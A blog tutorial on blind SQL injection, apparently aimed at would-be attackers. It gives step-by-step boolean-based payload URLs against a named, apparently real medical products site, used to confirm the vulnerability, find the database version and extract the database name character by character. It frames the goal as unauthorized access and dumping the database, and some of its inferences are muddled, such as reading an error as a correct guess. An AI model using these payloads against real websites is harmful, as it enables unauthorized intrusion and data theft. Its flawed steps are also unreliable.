As always before exploiting with new technique and technology, first learn what the new thing this time means in the core scenario. Learn about blind SQL Injection Exploit that enable attackers to exploit SQL Injected websites.
In my previous blog, I wrote in detail about how to exploit website with SQL Injection. The technique is used by hackers that attack on desired or random websites to accomplish their intentional or unintentional goals. This allow the attackers to gain unauthorized access to the particular websites. The attack on the websites with SQL Injection all depends on the hacker’s intent. So, move on to Blind SQL Injection.
Blind SQL Injection
Blind SQL Injection is a type of SQL Injection vulnerability in which the web application is vulnerable to SQL Injection but the result of SQL Injection won’t be displayed.
In contrary to SQL Injection, we discussed how hackers or malicious users use the error message from SQL database and upon that error attackers exploit the website and its database with some SQL commands and statements after knowing the website is vulnerable to SQL Injection.
But what if the error message from SQL database is suppressed by some techniques then how could the hacker come to know whether the SQL database of some website is vulnerable to SQL Injection or not?
This is the beauty of SQL Injection where the error message is not displayed though the website is vulnerable to SQL Injection. Modern hacking techniques include Blind SQL Injection through which malicious users can hack any website with intent to provide damage to the website or the user could be pen-tester who willingly to check the bugs and make them fixed with the consent of the website administration. This process includes legal documents and the user who is actually known as “The White Hat Hacker” makes the website managers know of the current bugs or vulnerabilities that exist in their domain area.
Now when the error message from database is not shown to the attacker, he can launch attack on the website by SQL Injection in anyways, this kind of SQL Injection is known as “Blind SQL Injection”.
In Blind SQL Injection the attacker is unaware of SQL error message from SQL database. The attacker uses his skills and knowledge by any means to exploit the website.
When the SQL database doesn’t show error messages to the attacker then the only way to exploit the website is by asking the database some questions. The questions generally and mainly contains boolean questions e.g True and False.
Now before having an example to exploit a website, we see the main difference between the two types of SQL Injection in breif.
SQL Injection VS Blind SQL Injection
In SQL Injection the attacker mainly focuses on the error messages from the database. After the error message the attacker takes steps to get the administration privileges by bombarding the website with some SQL commands and statements as described in the previous blog. So before leaning Blind SQL Injection you should have SQL Injection knowledge.
Whereas in Blind SQL Injection, the attacker doesn’t focus on the error message of database nor the attacker need any kind of error message to bombard the website by his malicious code. That’s why it is called Blind SQL Injection.
Example of Blind SQL Injection
In this example of Blind SQL Injection, I have introduced the following vulnerable website for demonstration purpose.
On this link you can perform the SQL Injection and surely you will get the access to its database.
Well, to get start for Blind SQL Injection with this above vulnerable link, keep in mind that the website is also vulnerable to SQL Injection but don’t mix with that. You better know the difference at all.
Determining the Vulnerable Website
The above link when pasted in the URL and after pressing enter, the following below query will run on the database.
Select * from products where id=33
Note that the id that contains the related data to products will be displayed by the website. But what if we write into this query some condition.
http://everyway-medical.com/products.php?id=33 and 1=1
The SQL query will become:
Select * from products where id=33 and 1=1
Of course the condition is valid. So the query will run correctly and will display the page. If it doesn’t work check for alternative techniques, will describe soon.
After this change the condition to 1=2 and run the query.
http://everyway-medical.com/products.php?id=33 and 1=2
If the page loaded correctly then the website might not be vulnerable to SQL Injection. But what if the page loaded differently, then its obvious that the website is vulnerable to SQL Injection. In this way attackers are able to make their way reachable to database and further way they can access the unauthorized access to the website remotely.
Determining Database Server Version
After we came to know that the website is vulnerable to SQL Injection, we have to move on and give attempt to find what database version the website is using on.
We will use the following query to acknowledge the database version for target website.
http://everyway-medical.com/products.php?id=33 and substring(version(),1,1)=4
Check the page and configure whether the particular targeted website was reloaded perfectly or not?
If the page loaded as usual then the target website is using a database version ‘4.x’ else in case the page didn’t load correctly then change value to 5, like below.
http://everyway-medical.com/products.php?id=33 and substring(version(),1,1)=5
If this condition worked the the database is of version ‘5.x’.
Determining Length of Database Name
For successful exploitation its compulsory to have the database full information. Let’s move to find the length of database name after knowing the version of database.
http://everyway-medical.com/products.php?id=33 and character_length(database())=x
The above query helps to find the length of database name where x is an integer an attacker uses randomly starting from 1 and moves on increment++.
For example to solve the problem, let’s assume we selected x=1 and run the query.
http://everyway-medical.com/products.php?id=33 and character_length(database())=1
If we get ‘Unknown Column Error Message’ it means that the length of database name is 1 (one character in database name). But if we aren’t getting the error message then it means to increment the value of x by 1 i.e x=x+1.
http://everyway-medical.com/products.php?id=33 and character_length(database())=2
Just keep on incrementing the value of x till we get an error message.
Determining Database Name
We successfully obtained the length of database name, so let’s find the name of database.
Consider we get the length of database name that is equal to 3. So, it means we have three characters in database name. The following query will manually check all the characters on the first place in the database name, if the character returned true then it means the character is in the database name on that particular place.
http://everyway-medical.com/products.php?id=33 and substring(database(),1,1)='a'
If the above query returned true then ‘a’ is on the first position.
Move on to the second position. The query becomes:
http://everyway-medical.com/products.php?id=33 and substring(database(),2,1)='a'
Start from ‘a’ if returned false write ‘b’, check for this
http://everyway-medical.com/products.php?id=33 and substring(database(),2,1)='b'
If this returned true move on for the third position with like,
http://everyway-medical.com/products.php?id=33 and substring(database(),3,1)='a'
Start from ‘a’ and the right character will return true else false.
From this done experimentation (injection attacks), we deduce the following result.
The length of database name is 3.
The first character was suppose ‘a’.
The second character was suppose ‘g’.
The third character was suppose ‘s’.
So, the database name becomes ‘ags’.
In this way we gathered information from the server.
A successful exploitation allows an attacker to dump the entire database.
Blind SQL Injection is slower than any other kind of SQL Injection because it consumes a lot of time. The attacker has to manually search for the database credentials which will make him a lot of time to do so, but he will get the database information successfully after performing it completely.
Leave your comments, if you didn’t get it.